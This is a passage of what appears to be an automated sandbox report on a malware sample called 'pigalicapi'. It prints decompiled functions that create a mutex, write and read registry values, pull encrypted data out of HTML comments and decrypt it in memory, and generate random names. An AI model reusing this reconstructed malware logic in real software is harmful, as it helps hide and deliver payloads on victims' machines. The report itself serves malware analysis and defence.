                                                                                                                                                                                                                                                                          0x04001316
                                                                                                                                                                                                                                                                          0x0400131d
                                                                                                                                                                                                                                                                          0x04001337
                                                                                                                                                                                                                                                                          0x0400133f
                                                                                                                                                                                                                                                                          0x0400134b
                                                                                                                                                                                                                                                                          0x04001368
                                                                                                                                                                                                                                                                          0x04001372
                                                                                                                                                                                                                                                                          0x04001372
                                                                                                                                                                                                                                                                          0x0400137d
                                                                                                                                                                                                                                                                          0x0400137d
                                                                                                                                                                                                                                                                          0x040012fc
                                                                                                                                                                                                                                                                          0x0400138d

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,0400C248,00000000,000F003F,00000000), ref: 04001337
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 04001345
                                                                                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(00000000,-00000208,00000000,00000001,?,?), ref: 04001368
                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04001372
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 0400137D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3411147897-0
                                                                                                                                                                                                                                                                          • Opcode ID: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                          • Instruction ID: 889d750eda8961b126f00a9021e235014b30ece64fb5bfebafecfaf2f158f27d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12210070A04309EBEB04CFE4C949BAEB7B4FB44301F108258E641BB280D779AE40DB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 1000223B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.608609386.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorHugeLastRead
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3239643929-0
                                                                                                                                                                                                                                                                          • Opcode ID: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
                                                                                                                                                                                                                                                                          • Instruction ID: c08fe1bd30c15a7bb6e8476d185febfb1ca0f6f7539b963f039c2b10503cc3e6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB818574A00209EFDB04CF94C890B9EBBB5FF88354F248198E959AB355D774EE81CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005E00() {
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				CreateMutexA(0, 0, "pigalicapi"); // executed
                                                                                                                                                                                                                                                                          				return 0 | GetLastError() == 0x000000b7;
                                                                                                                                                                                                                                                                          			}



                                                                                                                                                                                                                                                                          0x04005e0c
                                                                                                                                                                                                                                                                          0x04005e25

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                          • String ID: pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                                          • Opcode ID: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                          • Instruction ID: c9a096dff23d34124f73a3e8575822b5ba186ec69b5811b6053c60030017a183
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAC08C362883186BF2081B61ED4BB893A88C792E81F600030F30AEA0D0999968C08B16
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				signed int _v13;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                          				char _t48;
                                                                                                                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                                                                          				char _t63;
                                                                                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_v20 = _a4;
                                                                                                                                                                                                                                                                          					_v13 = 0;
                                                                                                                                                                                                                                                                          					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						_t48 = "<!--"; // 0x2d2d213c
                                                                                                                                                                                                                                                                          						_v32 = _t48;
                                                                                                                                                                                                                                                                          						_t63 =  *0x400c700; // 0x0
                                                                                                                                                                                                                                                                          						_v28 = _t63;
                                                                                                                                                                                                                                                                          						_t51 = E04007AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
                                                                                                                                                                                                                                                                          						_t78 = _t77 + 0x10;
                                                                                                                                                                                                                                                                          						_v24 = _t51;
                                                                                                                                                                                                                                                                          						if(_v24 == 0) {
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v12 = _v24 - _a4;
                                                                                                                                                                                                                                                                          							_t28 = _v12 + 4; // 0x4
                                                                                                                                                                                                                                                                          							_v36 = StrStrA(_v20 + _t28, "-->");
                                                                                                                                                                                                                                                                          							if(_v36 != 0) {
                                                                                                                                                                                                                                                                          								_v44 = _v36 - _v24 - 4;
                                                                                                                                                                                                                                                                          								_t58 = E04008090(_v24 + 4, _v44, _a12, _a16); // executed
                                                                                                                                                                                                                                                                          								_t77 = _t78 + 0x10;
                                                                                                                                                                                                                                                                          								_v40 = _t58;
                                                                                                                                                                                                                                                                          								if(_v40 > 0) {
                                                                                                                                                                                                                                                                          									_v13 = 1;
                                                                                                                                                                                                                                                                          									_v8 = _v40;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				L16:
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x04008256
                                                                                                                                                                                                                                                                          0x04008261
                                                                                                                                                                                                                                                                          0x04008285
                                                                                                                                                                                                                                                                          0x0400828f
                                                                                                                                                                                                                                                                          0x04008292
                                                                                                                                                                                                                                                                          0x04008296
                                                                                                                                                                                                                                                                          0x040082b1
                                                                                                                                                                                                                                                                          0x040082b6
                                                                                                                                                                                                                                                                          0x040082b9
                                                                                                                                                                                                                                                                          0x040082bf
                                                                                                                                                                                                                                                                          0x040082d6
                                                                                                                                                                                                                                                                          0x040082db
                                                                                                                                                                                                                                                                          0x040082de
                                                                                                                                                                                                                                                                          0x040082e5
                                                                                                                                                                                                                                                                          0x040082e7
                                                                                                                                                                                                                                                                          0x040082ed
                                                                                                                                                                                                                                                                          0x040082fb
                                                                                                                                                                                                                                                                          0x04008306
                                                                                                                                                                                                                                                                          0x0400830d
                                                                                                                                                                                                                                                                          0x04008318
                                                                                                                                                                                                                                                                          0x0400832e
                                                                                                                                                                                                                                                                          0x04008333
                                                                                                                                                                                                                                                                          0x04008336
                                                                                                                                                                                                                                                                          0x0400833d
                                                                                                                                                                                                                                                                          0x0400833f
                                                                                                                                                                                                                                                                          0x04008346
                                                                                                                                                                                                                                                                          0x04008346
                                                                                                                                                                                                                                                                          0x0400834f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400835a
                                                                                                                                                                                                                                                                          0x0400830d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040082e5
                                                                                                                                                                                                                                                                          0x04008296
                                                                                                                                                                                                                                                                          0x0400835f
                                                                                                                                                                                                                                                                          0x04008365

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000004,-->), ref: 04008300
                                                                                                                                                                                                                                                                            • Part of subcall function 04008090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID: -->$<!--
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                                          • Opcode ID: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                          • Instruction ID: 33a7bc7995a4c535701f75233fb1c46eed47e0fb0959c3fa2371b97aa1c284c8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23311971900249DFEF04EFA8C544BEEBBB1BB88308F14C959D505B7281E774AA84CB96
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E0400A400(char* _a4, char* _a8, char* _a12, int _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v12 = 0x80000002;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                          					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                          					if(_t25 == 0) {
                                                                                                                                                                                                                                                                          						_v20 = _a16;
                                                                                                                                                                                                                                                                          						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
                                                                                                                                                                                                                                                                          						if(_t27 == 0) {
                                                                                                                                                                                                                                                                          							_v8 = _v20;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x0400a406
                                                                                                                                                                                                                                                                          0x0400a411
                                                                                                                                                                                                                                                                          0x0400a429
                                                                                                                                                                                                                                                                          0x0400a439
                                                                                                                                                                                                                                                                          0x0400a43b
                                                                                                                                                                                                                                                                          0x0400a43b
                                                                                                                                                                                                                                                                          0x0400a442
                                                                                                                                                                                                                                                                          0x0400a45c
                                                                                                                                                                                                                                                                          0x0400a464
                                                                                                                                                                                                                                                                          0x0400a469
                                                                                                                                                                                                                                                                          0x0400a480
                                                                                                                                                                                                                                                                          0x0400a488
                                                                                                                                                                                                                                                                          0x0400a48d
                                                                                                                                                                                                                                                                          0x0400a48d
                                                                                                                                                                                                                                                                          0x0400a494
                                                                                                                                                                                                                                                                          0x0400a494
                                                                                                                                                                                                                                                                          0x0400a464
                                                                                                                                                                                                                                                                          0x0400a4a0

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                          • Opcode ID: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                          • Instruction ID: 715db8aa4ed00a9f1925e7802d1785fb3623660146ed6b0049a8ef53f9c2d8f0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70110D74A00309EBEB15CF94C848BEF77B8FB84744F14C558E914AB680D7B8AA51CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr* _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                                                                          				intOrPtr _t73;
                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v16 = _a8;
                                                                                                                                                                                                                                                                          					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t71;
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_t73 = E04001390(_v12, _a4, _v16, _v12, _v16); // executed
                                                                                                                                                                                                                                                                          						_v20 = _t73;
                                                                                                                                                                                                                                                                          						if(_v20 != 0) {
                                                                                                                                                                                                                                                                          							_v24 = _v12;
                                                                                                                                                                                                                                                                          							_v28 = _v20;
                                                                                                                                                                                                                                                                          							_v32 = E040087B0(_v20,  *_v24) & 0x0000ffff;
                                                                                                                                                                                                                                                                          							if(_v32 == 0xa) {
                                                                                                                                                                                                                                                                          								_v40 =  *((intOrPtr*)(_v24 + 4));
                                                                                                                                                                                                                                                                          								_v44 =  *((intOrPtr*)(_v24 + 8));
                                                                                                                                                                                                                                                                          								_v36 = E040016F0(_v24 + 0xc, _v28 - 0xc);
                                                                                                                                                                                                                                                                          								if(_v36 == _v44) {
                                                                                                                                                                                                                                                                          									E04008630(_v24 + 0xc, 4, _v40);
                                                                                                                                                                                                                                                                          									_v48 =  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                                                                                                                          									E04008630(_v24 + 0x10, _v48, _v40);
                                                                                                                                                                                                                                                                          									_v52 = _v28 - _v48 + 0x10;
                                                                                                                                                                                                                                                                          									_t52 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                          									_t91 = E04008A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48, 0x4013410, 0x254); // executed
                                                                                                                                                                                                                                                                          									if(_t91 != 0) {
                                                                                                                                                                                                                                                                          										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          										 *_a12 = _t93;
                                                                                                                                                                                                                                                                          										if( *_a12 != 0) {
                                                                                                                                                                                                                                                                          											_t60 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                          											E04007B70( *_a12, _v24 + _t60, _v52);
                                                                                                                                                                                                                                                                          											 *_a16 = _v52;
                                                                                                                                                                                                                                                                          											_v8 = _v52;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_v8 == 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x04008096
                                                                                                                                                                                                                                                                          0x040080a1
                                                                                                                                                                                                                                                                          0x04008246
                                                                                                                                                                                                                                                                          0x0400824c
                                                                                                                                                                                                                                                                          0x040080c5
                                                                                                                                                                                                                                                                          0x040080c8
                                                                                                                                                                                                                                                                          0x040080d8
                                                                                                                                                                                                                                                                          0x040080de
                                                                                                                                                                                                                                                                          0x040080e5
                                                                                                                                                                                                                                                                          0x040080fb
                                                                                                                                                                                                                                                                          0x04008103
                                                                                                                                                                                                                                                                          0x0400810a
                                                                                                                                                                                                                                                                          0x04008113
                                                                                                                                                                                                                                                                          0x04008119
                                                                                                                                                                                                                                                                          0x0400812d
                                                                                                                                                                                                                                                                          0x04008134
                                                                                                                                                                                                                                                                          0x04008140
                                                                                                                                                                                                                                                                          0x04008149
                                                                                                                                                                                                                                                                          0x04008162
                                                                                                                                                                                                                                                                          0x0400816b
                                                                                                                                                                                                                                                                          0x0400817e
                                                                                                                                                                                                                                                                          0x0400818c
                                                                                                                                                                                                                                                                          0x0400819e
                                                                                                                                                                                                                                                                          0x040081b1
                                                                                                                                                                                                                                                                          0x040081d3
                                                                                                                                                                                                                                                                          0x040081d8
                                                                                                                                                                                                                                                                          0x040081e2
                                                                                                                                                                                                                                                                          0x040081f1
                                                                                                                                                                                                                                                                          0x040081fa
                                                                                                                                                                                                                                                                          0x04008202
                                                                                                                                                                                                                                                                          0x0400820e
                                                                                                                                                                                                                                                                          0x04008219
                                                                                                                                                                                                                                                                          0x04008227
                                                                                                                                                                                                                                                                          0x0400822c
                                                                                                                                                                                                                                                                          0x0400822c
                                                                                                                                                                                                                                                                          0x04008202
                                                                                                                                                                                                                                                                          0x040081e2
                                                                                                                                                                                                                                                                          0x0400816b
                                                                                                                                                                                                                                                                          0x04008134
                                                                                                                                                                                                                                                                          0x04008233
                                                                                                                                                                                                                                                                          0x04008240
                                                                                                                                                                                                                                                                          0x04008240
                                                                                                                                                                                                                                                                          0x04008233
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040080e5

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04008240
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 040081F1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 142027497-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                          • Instruction ID: 586cb0610e47de0410656fb7eac1ad2d30ffe64d38e300cd8a2e1f05076280ab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3551E7B5E00209AFEB14DF98D984BEEB7B5BB48304F14C158E905BB381D774AA40CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                                                          			E04005930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                          				void _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				signed int _v60;
                                                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
                                                                                                                                                                                                                                                                          					E04007B70( &_v24, _a4, 0x10);
                                                                                                                                                                                                                                                                          					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
                                                                                                                                                                                                                                                                          					asm("movsw");
                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                          					_v56 = 0;
                                                                                                                                                                                                                                                                          					while(_v56 < _a12) {
                                                                                                                                                                                                                                                                          						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
                                                                                                                                                                                                                                                                          						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
                                                                                                                                                                                                                                                                          						if(_v56 == 0) {
                                                                                                                                                                                                                                                                          							CharUpperA(_a8); // executed
